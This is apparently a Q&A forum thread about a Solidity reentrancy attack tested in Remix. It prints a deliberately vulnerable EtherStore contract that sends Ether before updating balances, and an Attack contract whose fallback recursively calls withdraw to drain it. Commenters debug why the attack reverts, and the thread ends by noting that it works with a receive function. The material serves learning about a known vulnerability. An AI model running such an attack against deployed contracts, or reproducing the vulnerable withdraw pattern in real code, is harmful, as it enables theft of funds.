# The transaction has been reverted to the initial state

Tags: solidity, remix, reentrant-attacks

I have been testing the script for reentrancy attack in remix, but every time I run it reverts the transaction.
I did it in two different  accounts, one for the etherstore's contract(deploying) and another one for the attack's contract(deploying). I funded etherstore's contract with a 3rd account. The account that deployed attack's contract executed the function with the same name.  It throws this:

"transact to Attack.attack errored: VM error: revert.

revert
The transaction has been reverted to the initial state.
Note: The called function should be payable if you send value and the value you send should be less than your current balance.
Debug the transaction to get more information."

EtherStore's contract:

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;
contract EtherStore {
    uint constant public WITHDRAWAL_LIMIT = 1 ether;
    mapping(address => uint) public lastWithdrawTime;
    mapping(address => uint) public balances;

    function deposit() public payable {
    balances[msg.sender] += msg.value;
}

    function withdraw(uint _amount) public {
    require(balances[msg.sender] >= _amount);
    require(_amount <= WITHDRAWAL_LIMIT);
    require(block.timestamp >= lastWithdrawTime[msg.sender] + 1 weeks);

    (bool sent, ) = msg.sender.call{value: _amount}("");
    require(sent, "Failed to send Ether");

    balances[msg.sender] -= _amount;
    lastWithdrawTime[msg.sender] = block.timestamp;
}

// Helper function to check the balance of this contract
    function getBalance() public view returns (uint) {
    return address(this).balance;
}
}
```

Attack's contract:

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;
interface EtherStore {

    function deposit() external payable;
    function withdraw(uint _amount) external; 
//
}
contract Attack {

    EtherStore private etherStore;

    constructor() {
    etherStore = 
    EtherStore(address(0xd9145CCE52D386f254917e481eB44e9943F39138));
}

// Fallback is called when EtherStore sends Ether to this contract.
    fallback() external payable {
    if (address(etherStore).balance >= 1 ether) {
        etherStore.withdraw(1 ether);
    }
}
    receive()external payable{}

    function attack() external payable {
    require(msg.value >= 1 ether);
    etherStore.deposit{value: 1 ether}();
    etherStore.withdraw(1 ether);
}

// Helper function to check the balance of this contract
    function getBalance() public view returns (uint) {
    return address(this).balance;
    }
}
```

Comment: Could you link a failed tx so we can debug? Also, the fallback() function can only use 2300 gas, so it may be the problem. We must see the tx to be sure.

Comment: Or it could be that you did not create or import an Etherstore interface in the attack.sol contract.

Comment: [link] https://remix.ethereum.org/#optimize=false&runs=200&evmVersion=null&version=soljson-v0.7.6+commit.7338295f.js @Undead8

Comment: Now it runs but does not take the funds at EtherStore contract. It simply deposits 1 ether into attack's contract, then, if I try to run it again it fails.

Comment: @HenryRosales Please include the source code as text in the question, it makes easier to answer it.

Comment: There you have source code, thanks beforehand.

Comment: I found an article, they used receive instead of fallback function and the attack is executed.  My question now would be: why is executed with receive function and not with fallback?